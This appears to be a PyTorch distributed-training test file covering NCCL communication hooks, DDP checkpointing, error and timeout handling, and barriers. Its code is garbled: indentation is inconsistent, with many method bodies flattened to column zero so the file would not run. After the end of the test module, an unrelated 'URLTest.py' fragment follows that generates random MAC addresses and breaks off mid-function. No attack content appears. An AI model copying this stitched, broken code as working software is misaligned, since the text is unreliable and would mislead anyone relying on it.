def _test_powerSGD_ddp_comm_hook_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether Python DDP communication hook POWER_SGD
can give the same result with the case of no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# Get GPU model with the hook registered.
# Test the hook with different algorithmic configs.
for use_error_feedback, warm_start in product([True, False], [True, False]):
state = powerSGD.PowerSGDState(
process_group=process_group,
matrix_approximation_rank=1,
use_error_feedback=use_error_feedback,
warm_start=warm_start,
)
for hook in [powerSGD.powerSGD_hook, powerSGD.batched_powerSGD_hook]:
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, hook, gradient_as_bucket_view, state
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_builtin_ddp_comm_hooks_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether built-in C++ DDP communication hooks ALLREDUCE and FP16_COMPRESS
can give the same result with the case of no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for comm_hook_type in [
dist.BuiltinCommHookType.ALLREDUCE,
dist.BuiltinCommHookType.FP16_COMPRESS,
]:
# Get GPU model with the built-in communication hook.
gpu_model = self._gpu_model_with_builtin_ddp_comm_hook(
process_group, comm_hook_type, gradient_as_bucket_view
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_ddp_comm_hook_allreduce_hook_nccl(self):
        # Default config: grads are not bucket views, graph is not static.
        self._test_ddp_comm_hook_allreduce_hook_nccl()
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_default_ddp_comm_hooks_nccl(self):
        # Default config: grads are not bucket views.
        self._test_default_ddp_comm_hooks_nccl()
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_fp16_compress_wrapper_nccl(self):
        # Default config: grads are not bucket views.
        self._test_fp16_compress_wrapper()
    @requires_nccl()
    @requires_nccl_version((2, 9, 7), "Need NCCL 2.9.7+ for BF16_COMPRESS")
    @sandcastle_skip_if(
        not BFLOAT16_AVAILABLE,
        "BFloat16 is only supported by CUDA 11+",
    )
    @skip_if_lt_x_gpu(2)
    @skip_if_rocm
    def test_bf16_compress_wrapper_nccl(self):
        # Default config: grads are not bucket views.
        self._test_bf16_compress_wrapper()
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_hook_then_sgd_nccl(self):
        # Fused allreduce+SGD hook with default (non-view) gradients.
        sgd_lr = 1e-2
        sgd_momentum = 0.9
        sgd_weight_decay = 0.01
        self._test_hook_then_optimizer(
            _FunctionalSGD,
            sgd_lr,
            momentum=sgd_momentum,
            weight_decay=sgd_weight_decay,
        )
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_hook_then_sgd_nccl_grad_as_bucket_view(self):
        # Same as test_hook_then_sgd_nccl but with grads viewing bucket storage.
        sgd_lr = 1e-2
        sgd_momentum = 0.9
        sgd_weight_decay = 0.01
        self._test_hook_then_optimizer(
            _FunctionalSGD,
            sgd_lr,
            momentum=sgd_momentum,
            weight_decay=sgd_weight_decay,
            gradient_as_bucket_view=True
        )
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_hook_then_adamw_nccl(self):
        # NOTE(review): despite the name lacking a "_grad_as_bucket_view"
        # suffix, this passes gradient_as_bucket_view=True (cf. the SGD/Adam
        # naming convention nearby) — confirm this is intended.
        adamw_lr = 1e-2
        adamw_betas = (0.9, 0.99)
        adamw_eps = 1e-6
        self._test_hook_then_optimizer(
            _FunctionalAdamW,
            adamw_lr,
            betas=adamw_betas,
            eps=adamw_eps,
            gradient_as_bucket_view=True
        )
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_adam_nccl(self):
adam_lr = 1e-2
adam_betas = (0.9, 0.99)
adam_eps = 1e-6
self._test_hook_then_optimizer(
_FunctionalAdam,
adam_lr,
betas=adam_betas,
eps=adam_eps,
gradient_as_bucket_view=True
)
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_hook_then_adam_nccl_grad_as_bucket_view(self):
        # Fused allreduce+Adam hook with grads viewing bucket storage.
        adam_lr = 1e-2
        adam_betas = (0.9, 0.99)
        adam_eps = 1e-6
        self._test_hook_then_optimizer(
            _FunctionalAdam,
            adam_lr,
            betas=adam_betas,
            eps=adam_eps,
            gradient_as_bucket_view=True
        )
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_builtin_ddp_comm_hooks_nccl(self):
        # Default config: grads are not bucket views.
        self._test_builtin_ddp_comm_hooks_nccl()
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_powerSGD_ddp_comm_hook_nccl(self):
        # Default config: grads are not bucket views.
        self._test_powerSGD_ddp_comm_hook_nccl()
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_ddp_comm_hook_allreduce_hook_nccl_grad_is_view(self):
        # Same as the default test but with grads viewing bucket storage.
        self._test_ddp_comm_hook_allreduce_hook_nccl(gradient_as_bucket_view=True)
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_ddp_comm_hook_allreduce_hook_nccl_static_graph(self):
        # Same as the default test but with DDP's static-graph optimization on.
        self._test_ddp_comm_hook_allreduce_hook_nccl(static_graph=True)
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_default_ddp_comm_hooks_nccl_is_view(self):
        # Same as the default test but with grads viewing bucket storage.
        self._test_default_ddp_comm_hooks_nccl(gradient_as_bucket_view=True)
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_fp16_compress_wrapper_is_view(self):
        # Same as the default test but with grads viewing bucket storage.
        self._test_fp16_compress_wrapper(gradient_as_bucket_view=True)
    @requires_nccl()
    @requires_nccl_version((2, 9, 7), "Need NCCL 2.9.7+ for BF16_COMPRESS")
    @sandcastle_skip_if(
        not BFLOAT16_AVAILABLE,
        "BFloat16 is only supported by CUDA 11+",
    )
    @skip_if_lt_x_gpu(2)
    @skip_if_rocm
    def test_bf16_compress_wrapper_is_view(self):
        # Same as the default test but with grads viewing bucket storage.
        self._test_bf16_compress_wrapper(gradient_as_bucket_view=True)
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_builtin_ddp_comm_hooks_nccl_grad_is_view(self):
        # Same as the default test but with grads viewing bucket storage.
        self._test_builtin_ddp_comm_hooks_nccl(gradient_as_bucket_view=True)
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_powerSGD_ddp_comm_hook_nccl_grad_is_view(self):
        # Same as the default test but with grads viewing bucket storage.
        self._test_powerSGD_ddp_comm_hook_nccl(gradient_as_bucket_view=True)
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_ddp_comm_hook_allreduce_with_then_hook_nccl(self):
        """
        This unit test verifies whether a DDP communication hook that calls allreduce and then
        multiplies the result by ten and divides by two gives the expected result.
        """
        store = c10d.FileStore(self.file_name, self.world_size)
        process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
        def allreduce_with_then_hook(
            state: object, bucket: dist.GradBucket
        ) -> torch.futures.Future[torch.Tensor]:
            # Pre-divide by world size so the allreduced sum equals the average.
            tensors = [bucket.buffer() / self.world_size]
            fut = process_group.allreduce(tensors).get_future()
            def mult(fut):
                # Multiply the result by 10.
                return 10 * fut.value()[0]
            def div(fut):
                # Divide the result by 2.
                return 0.5 * fut.value()
            # Chain the two then-callbacks: net effect is a x5 scaling.
            return fut.then(mult).then(div)
        # Get GPU model with allreduce_with_then_hook registered.
        gpu_model = self._gpu_model_with_ddp_comm_hook(
            process_group, allreduce_with_then_hook
        )
        # check whether the grads are equal to what allreduce returns multiplied by 5.
        # without the comm_hook, result would be still 0.25 * torch.ones(2, 2).
        self._run_and_verify_hook(gpu_model, 8, 1.25 * torch.ones(2, 2))
class AcceptsParam(torch.nn.Module):
def __init__(self, p, factor):
super().__init__()
self.a = p
self.f = factor
def forward(self, input):
return input + self.a * self.f
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_ddp_weight_sharing(self):
        """One Parameter shared by two submodules: DDP grads must match the
        analytic value across set_to_none and bucket-view configurations."""
        store = c10d.FileStore(self.file_name, self.world_size)
        process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
        size = 2048 * 2048
        dev = self.rank
        world = self.world_size
        p = torch.nn.Parameter(torch.randn(size, requires_grad=True))
        for try_set_to_none, use_bucket_view in product((False, True), (False, True)):
            # Both submodules share the same Parameter p.
            m = torch.nn.Sequential(
                self.AcceptsParam(p, dev + 1), self.AcceptsParam(p, dev + 1)
            ).cuda(dev)
            m = torch.nn.parallel.DistributedDataParallel(
                m,
                bucket_cap_mb=1,
                gradient_as_bucket_view=use_bucket_view,
                device_ids=[dev],
                process_group=process_group,
            )
            for i in range(3):
                m.zero_grad(set_to_none=try_set_to_none)
                m(1).sum().backward()
                # Each param value is multiplied by "rank + 1" twice in forward, so the grad
                # values produced by a particular rank should be 2. * (rank + 1).
                # Summing these over ranks and dividing by world size gives the expected result:
                analytic = torch.full_like(
                    p, 2.0 * (world * (world + 1.0) / 2.0) / world, device=dev
                )
                # NOTE(review): this loop rebinds ``p``, shadowing the shared
                # Parameter created above; later iterations rely on the module
                # holding that same Parameter object — confirm benign.
                for name, p in m.named_parameters():
                    self.assertEqual(
                        p.grad,
                        analytic,
                        "mismatch at "
                        + name
                        + ".grad for "
                        + "set_to_none = {}, use_bucket_view = {}".format(
                            try_set_to_none, use_bucket_view
                        ),
                    )
# A list of tests for ddp with activation checkpointing
# when gradient_as_bucket_view=True, False.
# Most of the tests are referred to
# https://github.com/facebookresearch/fairscale/blob/main/tests/nn/pipe/test_checkpoint_ddp.py
class CheckpointOnceModule(nn.Module):
def __init__(self):
super().__init__()
self.l1 = nn.Linear(20, 20)
self.l2 = nn.Linear(20, 20)
def forward(self, inp):
x = self.l1(inp)
x = checkpoint(self.l2, x)
return x
class CheckpointTwiceModule(CheckpointOnceModule):
def __init__(self):
super().__init__()
def forward(self, inp):
x = self.l1(inp)
x = checkpoint(self.l2, x)
x = checkpoint(self.l2, x)
return x
def _prepare_dummy_data(self):
ddp_bs = 16
bs = ddp_bs * self.world_size
input = torch.rand((bs, 20), device="cuda", requires_grad=True)
target = torch.randn((bs, 20), device="cuda")
offset = self.rank * ddp_bs
ddp_input = input[offset : offset + ddp_bs]
ddp_target = target[offset : offset + ddp_bs]
return input, ddp_input, target, ddp_target
def _train_model(self, model, input_var, target, loss, run_checkpoint=False):
model.train()
if run_checkpoint:
output = checkpoint(model, input_var)
else:
output = model(input_var)
l = loss(output, target)
l.backward()
    def _test_ddp_checkpointing(
        self,
        input_model,
        process_group,
        use_bucket_view,
        find_unused_parameters=False,
        static_graph=False,
        run_checkpoint=False,
    ):
        """Train a plain copy and a DDP copy of input_model for 5 steps and
        assert their per-parameter gradients match."""
        # to reproduce the same training results
        torch.cuda.set_device(self.rank)
        torch.manual_seed(31415)
        model = copy.deepcopy(input_model).cuda()
        ddp_model = copy.deepcopy(input_model).cuda()
        ddp_model = nn.parallel.DistributedDataParallel(
            ddp_model,
            bucket_cap_mb=1,
            gradient_as_bucket_view=use_bucket_view,
            device_ids=[self.rank],
            process_group=process_group,
            find_unused_parameters=find_unused_parameters,
        )
        if static_graph:
            ddp_model._set_static_graph()
        # The DDP logging data should reflect the static-graph setting.
        self.assertEqual(
            ddp_model._get_ddp_logging_data().get("static_graph", 0), static_graph
        )
        input, ddp_input, target, ddp_target = self._prepare_dummy_data()
        loss = nn.MSELoss()
        for i in range(5):
            model.zero_grad(set_to_none=False)
            ddp_model.zero_grad(set_to_none=False)
            self._train_model(model, input, target, loss, run_checkpoint=run_checkpoint)
            self._train_model(
                ddp_model, ddp_input, ddp_target, loss, run_checkpoint=run_checkpoint
            )
            for i, j in zip(model.parameters(), ddp_model.parameters()):
                self.assertTrue(i.grad is not None)
                self.assertTrue(j.grad is not None)
                self.assertEqual(i.grad, j.grad, rtol=1.3e-06, atol=5e-5)
    # DDP works as expect when layer is checkpointed only once
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_ddp_checkpointing_once(self):
        store = c10d.FileStore(self.file_name, self.world_size)
        process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
        # Exercise all combinations of bucket-view grads and static graph.
        for use_bucket_view, static_graph in product((False, True), (False, True)):
            self._test_ddp_checkpointing(
                self.CheckpointOnceModule(),
                process_group=process_group,
                use_bucket_view=use_bucket_view,
                static_graph=static_graph,
            )
    # DDP will fail when there are unused_parameters in the model
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_ddp_checkpointing_unused_params(self):
        store = c10d.FileStore(self.file_name, self.world_size)
        process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
        for use_bucket_view in (True, False):
            # find_unused_parameters + checkpointing must raise without a
            # static graph.
            with self.assertRaisesRegex(
                RuntimeError,
                "Expected to mark a variable ready only once.",
            ):
                model = self._test_ddp_checkpointing(
                    self.CheckpointOnceModule(),
                    process_group=process_group,
                    use_bucket_view=use_bucket_view,
                    find_unused_parameters=True,
                    static_graph=False,
                )
            # test passes when static_graph is true
            model = self._test_ddp_checkpointing(
                self.CheckpointOnceModule(),
                process_group=process_group,
                use_bucket_view=use_bucket_view,
                find_unused_parameters=True,
                static_graph=True,
            )
    # DDP will fail when the same layer is checkponted twice
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_ddp_checkpointing_twice(self):
        store = c10d.FileStore(self.file_name, self.world_size)
        process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
        for use_bucket_view in (True, False):
            # Checkpointing the same layer twice must raise without a static graph.
            with self.assertRaisesRegex(
                RuntimeError,
                "Expected to mark a variable ready only once.",
            ):
                model = self._test_ddp_checkpointing(
                    self.CheckpointTwiceModule(),
                    process_group=process_group,
                    use_bucket_view=use_bucket_view,
                    static_graph=False,
                )
            # With static_graph=True the same model trains successfully.
            model = self._test_ddp_checkpointing(
                self.CheckpointTwiceModule(),
                process_group=process_group,
                use_bucket_view=use_bucket_view,
                static_graph=True,
            )
    # DDP works as expected if there is weight sharing among layers
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_ddp_checkpointing_weight_sharing(self):
        store = c10d.FileStore(self.file_name, self.world_size)
        process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
        torch.cuda.set_device(self.rank)
        for use_bucket_view, static_graph in product((False, True), (False, True)):
            torch.manual_seed(31415)
            l1 = nn.Linear(20, 20)
            l2 = nn.Linear(20, 20)
            # Tie the two layers' weights to exercise shared-parameter handling.
            l1.weight = l2.weight
            model = nn.Sequential(l1, l2)
            self._test_ddp_checkpointing(
                model,
                process_group=process_group,
                use_bucket_view=use_bucket_view,
                static_graph=static_graph,
                run_checkpoint=True,
            )
class NcclErrorHandlingTest(MultiProcessTestCase):
    """Tests for NCCL error/timeout propagation and communicator aborts.

    Several tests deliberately crash or hang child processes, so return-code
    checking is disabled for those in setUp.
    """

    def setUp(self):
        super(NcclErrorHandlingTest, self).setUp()
        # Need to skip return code checking for these tests since the child
        # processes don't exit cleanly.
        self.skip_return_code_checks = [
            self.test_nccl_errors_blocking_abort.__wrapped__,
            self.test_nccl_errors_blocking_sigkill.__wrapped__,
            self.test_nccl_errors_blocking_sigterm.__wrapped__,
            self.test_nccl_errors_blocking_nonzero_exit.__wrapped__,
        ]
        # NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
        # that use NCCL_BLOCKING_WAIT will test it as expected.
        os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
        self._spawn_processes()

    def tearDown(self):
        super(NcclErrorHandlingTest, self).tearDown()
        # Best-effort removal of the FileStore backing file.
        try:
            os.remove(self.file_name)
        except OSError:
            pass

    @property
    def op_timeout_sec(self):
        # Per-operation wait timeout (seconds) used by the blocking-wait tests.
        return 1

    @property
    def world_size(self):
        return 3

    @property
    def blocking_wait_error_msg(self):
        # Message raised by a blocking wait when a collective times out.
        return "Caught collective operation timeout"

    def _run_all_reduce(self, pg):
        # Helper used as a thread target: issue one allreduce on this rank's GPU.
        pg.allreduce(torch.rand(10).cuda(self.rank))

    @requires_nccl()
    @requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
    @skip_if_lt_x_gpu(3)
    @skip_if_rocm
    @sandcastle_skip("Test does not pass when run locally")
    def test_nccl_errors_nonblocking(self):
        # Note: we unset and restore NCCL_ASYNC_ERROR_HANDLING for this test
        # since test_c10d_common runs with async error handling by default, but this
        # tests behavior when it is not enabled.
        prev_nccl_async_error_handling = os.environ.get(
            "NCCL_ASYNC_ERROR_HANDLING", None
        )
        os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "0"
        try:
            store = c10d.FileStore(self.file_name, self.world_size)
            process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
            process_group.allreduce(torch.rand(10).cuda(self.rank))
            if self.rank == 0:
                # This allreduce does not block Python thread as allreduce enqueues
                # the cuda operation, and then wait only blocks the current cuda
                # stream.
                work = process_group.allreduce(torch.rand(10).cuda(self.rank))
                work.wait()
                # Now the work scheduled next should hang forever since the previous
                # allreduce will never complete.
                t = threading.Thread(target=self._run_all_reduce, args=(process_group,))
                t.daemon = True
                t.start()
                t.join(int(get_timeout(self.id()) / 5))
                self.assertTrue(t.is_alive())
        finally:
            # Restore the previous value even on failure. Previously the
            # variable was left set to "0" when it was originally unset.
            if prev_nccl_async_error_handling is not None:
                os.environ[
                    "NCCL_ASYNC_ERROR_HANDLING"
                ] = prev_nccl_async_error_handling
            else:
                os.environ.pop("NCCL_ASYNC_ERROR_HANDLING", None)

    def _test_nccl_errors_blocking(self, func):
        """Rank 1 dies via ``func`` after one collective; rank 0's next wait
        must raise a timeout, and the remaining rank's communicators must be
        aborted by the watchdog."""
        store = c10d.FileStore(self.file_name, self.world_size)
        process_group = c10d.ProcessGroupNCCL(
            store,
            self.rank,
            self.world_size,
            timeout=timedelta(seconds=10),
        )
        process_group.allreduce(torch.rand(10).cuda(self.rank))
        if self.rank == 0:
            work = process_group.allreduce(torch.rand(10).cuda(self.rank))
            with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
                # Operation would time out in blocking mode.
                work.wait(timeout=timedelta(seconds=self.op_timeout_sec))
            # Run some GPU operations to make sure cuda has not gotten stuck.
            # It was observed cuda could get stuck if NCCL communicators were
            # not properly aborted before throwing RuntimeError.
            torch.rand(10).cuda(self.rank)
        elif self.rank == 1:
            # Clean up structures (ex: files for FileStore before going down)
            del process_group
            func()
        else:
            # Wait for timeout
            time.sleep(2 * self.op_timeout_sec)
            # Now verify communicators on this rank have been aborted by the watchdog thread.
            self._wait_for_comm_abort(process_group)

    @with_nccl_blocking_wait
    @requires_nccl()
    @requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
    @skip_if_lt_x_gpu(3)
    @skip_if_rocm
    def test_nccl_errors_blocking_clean_exit(self):
        self._test_nccl_errors_blocking(lambda: sys.exit(0))

    @with_nccl_blocking_wait
    @requires_nccl()
    @requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
    @skip_if_lt_x_gpu(3)
    @skip_if_rocm
    def test_nccl_errors_blocking_nonzero_exit(self):
        self._test_nccl_errors_blocking(lambda: sys.exit(1))

    @with_nccl_blocking_wait
    @requires_nccl()
    @requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
    @skip_if_lt_x_gpu(3)
    @skip_if_rocm
    @sandcastle_skip(
        "Frequently times out see https://github.com/pytorch/pytorch/issues/58920"
    )
    def test_nccl_errors_blocking_abort(self):
        self._test_nccl_errors_blocking(lambda: os.abort())

    @with_nccl_blocking_wait
    @requires_nccl()
    @requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
    @skip_if_lt_x_gpu(3)
    @skip_if_rocm
    def test_nccl_errors_blocking_sigkill(self):
        self._test_nccl_errors_blocking(lambda: os.kill(os.getpid(), signal.SIGKILL))

    @with_nccl_blocking_wait
    @requires_nccl()
    @requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
    @skip_if_lt_x_gpu(3)
    @skip_if_rocm
    def test_nccl_errors_blocking_sigterm(self):
        self._test_nccl_errors_blocking(lambda: os.kill(os.getpid(), signal.SIGTERM))

    @with_nccl_blocking_wait
    @requires_nccl()
    @requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
    @skip_if_lt_x_gpu(3)
    def test_nccl_blocking_wait_with_barrier(self):
        store = c10d.FileStore(self.file_name, self.world_size)
        process_group = c10d.ProcessGroupNCCL(
            store,
            self.rank,
            self.world_size,
            timeout=timedelta(seconds=10),
        )
        process_group.barrier().wait()
        if self.rank == 0:
            with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
                # This should timeout
                process_group.barrier().wait(timeout=timedelta(seconds=self.op_timeout_sec))

    def _run_invalid_nccl_blocking_wait_env(self, val):
        # An invalid NCCL_BLOCKING_WAIT value must fail group construction.
        os.environ["NCCL_BLOCKING_WAIT"] = val
        store = c10d.FileStore(self.file_name, self.world_size)
        with self.assertRaises(RuntimeError):
            c10d.ProcessGroupNCCL(store, self.rank, self.world_size)

    @requires_nccl()
    @skip_if_lt_x_gpu(3)
    def test_invalid_nccl_blocking_wait_env(self):
        self._run_invalid_nccl_blocking_wait_env("abc")
        self._run_invalid_nccl_blocking_wait_env("-1")
        self._run_invalid_nccl_blocking_wait_env("2147483647")
        self._run_invalid_nccl_blocking_wait_env("4294967295")

    def _wait_for_comm_abort(self, process_group):
        """
        Waits for the watchdog thread to abort communicators for the process group.
        """
        while True:
            try:
                process_group.allreduce(torch.rand(10).cuda(self.rank))
            except Exception as e:
                if "NCCL communicator was aborted" in str(e):
                    return
                else:
                    raise e
            time.sleep(1)

    @with_nccl_blocking_wait
    @requires_nccl()
    @skip_if_lt_x_gpu(3)
    def test_nccl_timeout(self):
        store = c10d.FileStore(self.file_name, self.world_size)
        # Initialize process_group.
        process_group = c10d.ProcessGroupNCCL(
            store, self.rank, self.world_size, timeout=timedelta(seconds=10)
        )
        process_group.allreduce(torch.rand(10).cuda(self.rank)).wait(timeout=timedelta(seconds=5))
        if self.rank == 0:
            # This should timeout in about 1 second.
            # Watchdog may abort timed out work resulting in NCCL error instead of operation timed out.
            with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
                process_group.allreduce(torch.rand(10).cuda(self.rank)).wait(timeout=timedelta(seconds=1))
        else:
            # Sleep to ensure timeout.
            time.sleep(10)
            self._wait_for_comm_abort(process_group)
class CommTest(test_c10d_common.AbstractCommTest, MultiProcessTestCase):
    def setUp(self):
        super(CommTest, self).setUp()
        # NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
        # that use NCCL_BLOCKING_WAIT will test it as expected.
        os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
        # Launch one subprocess per rank for each test.
        self._spawn_processes()
    def tearDown(self):
        super(CommTest, self).tearDown()
        # Best-effort removal of the FileStore backing file.
        try:
            os.remove(self.file_name)
        except OSError:
            pass
def _test_broadcast_coalesced(self, process_group, device, root_rank):
half = torch.float16
# No support for float16 for CPU tensors
if device == torch.device("cpu"):
half = torch.float32
target = torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float32, device=device).chunk(5)
target += torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float64, device=device).chunk(5)
target += torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float32, device=device).chunk(5)
# The tensors to pass to broadcast are idential to the target
# only on the process that is the root of the broadcast.
if self.rank == root_rank:
tensors = list(tensor.clone() for tensor in target)
else:
tensors = list(torch.zeros_like(tensor) for tensor in target)
if self.rank != root_rank:
self.assertNotEqual(tensors, target)
c10d._broadcast_coalesced(
process_group, tensors, buffer_size=256, src=root_rank
)
if self.rank != root_rank:
self.assertEqual(tensors, target)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_broadcast_coalesced_nccl(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
device = torch.device("cuda:%d" % self.rank)
ranks = [0, 1]
for root_rank in ranks:
self._test_broadcast_coalesced(process_group, device, root_rank)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_sequence_num_set_default_pg_nccl(self):
torch.cuda.set_device(self.rank)
self._test_sequence_num_set_default_pg(backend="nccl")
@skip_if_lt_x_gpu(2)
@requires_nccl()
def test_sequence_num_incremented_nccl_default(self):
self._test_sequence_num_incremented_default_group("nccl")
@skip_if_lt_x_gpu(4)
@requires_nccl()
def test_sequence_num_incremented_nccl_subgroup(self):
if self.world_size < 4:
return sandcastle_skip("Test requires world_size of at least 4")
self._test_sequence_num_incremented_subgroup("nccl")
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_sequence_num_set_nccl_new_group(self):
torch.cuda.set_device(self.rank)
self._test_sequence_num_set_new_group(backend="nccl")
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_pass_nccl_options_high_priority_stream(self):
pg_opts = c10d.ProcessGroupNCCL.Options()
pg_opts.is_high_priority_stream = True
store = c10d.FileStore(self.file_name, self.world_size)
# Test init_process_group accepts options
dist.init_process_group(
"nccl",
world_size=self.world_size,
rank=self.rank,
store=store,
pg_options=pg_opts,
)
# Test with new_group
pg = c10d.new_group([0, 1], pg_options=pg_opts)
# test if the process group constructed with high priority stream
self.assertTrue(pg.options.is_high_priority_stream)
# test the process group works as expected
t = torch.tensor([self.rank + 1] * 10).cuda(self.rank)
pg.allreduce(t).wait()
expected_tensor = torch.tensor([3] * 10).cuda(self.rank)
self.assertEqual(expected_tensor, t)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
c10d.all_reduce(t)
expected_tensor = torch.tensor([3] * 10).cuda(2 * self.rank)
self.assertEqual(expected_tensor, t)
# Test with new_group
pg = c10d.new_group([0, 1])
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
pg = c10d.new_group([0])
if self.rank == 0:
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
expected_tensor = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
pg = c10d.new_group([1])
if self.rank == 1:
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
expected_tensor = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout(self):
store = c10d.FileStore(self.file_name, self.world_size)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError, "Health check failure"
):
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=10),
)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout_new_group(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=10),
)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError, "Health check failure"
):
c10d.new_group([0, 1], timeout=timedelta(seconds=1))
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0], timeout=timedelta(seconds=1))
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout_new_group_non_member(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=10),
)
if self.rank == 1:
with self.assertRaisesRegex(
RuntimeError, "Health check failure"
):
c10d.new_group([0, 1], timeout=timedelta(seconds=1))
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0], timeout=timedelta(seconds=1))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_barrier_device_ids(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
c10d.barrier(device_ids=[self.rank])
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_barrier_device_ids_function_argument(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
with self.assertRaisesRegex(RuntimeError, "Invalid function argument"):
c10d.barrier(device_ids=self.rank)
if __name__ == "__main__":
assert (
not torch.cuda._initialized
), "test_distributed must not have initialized CUDA context on main process"
run_tests()
|
URLTest.py | #coding=utf-8
import random
import threading
from time import ctime,sleep
import json
import urllib2
import time
def random_mac():
    """Return a random MAC address string such as "3f:a0:17:4e:bb:1c".

    Each of the six octets is built from two *independent* random hex digits.
    The previous implementation used random.sample, which draws without
    replacement, so octets with a repeated digit (e.g. "aa", "77") could
    never be produced - a subtle bias in the generated addresses.
    """
    octets = []
    for _ in range(6):
        octets.append("".join(random.choice("0123456789abcdef") for _ in range(2)))
    return ":".join(octets)
def random_rssi():
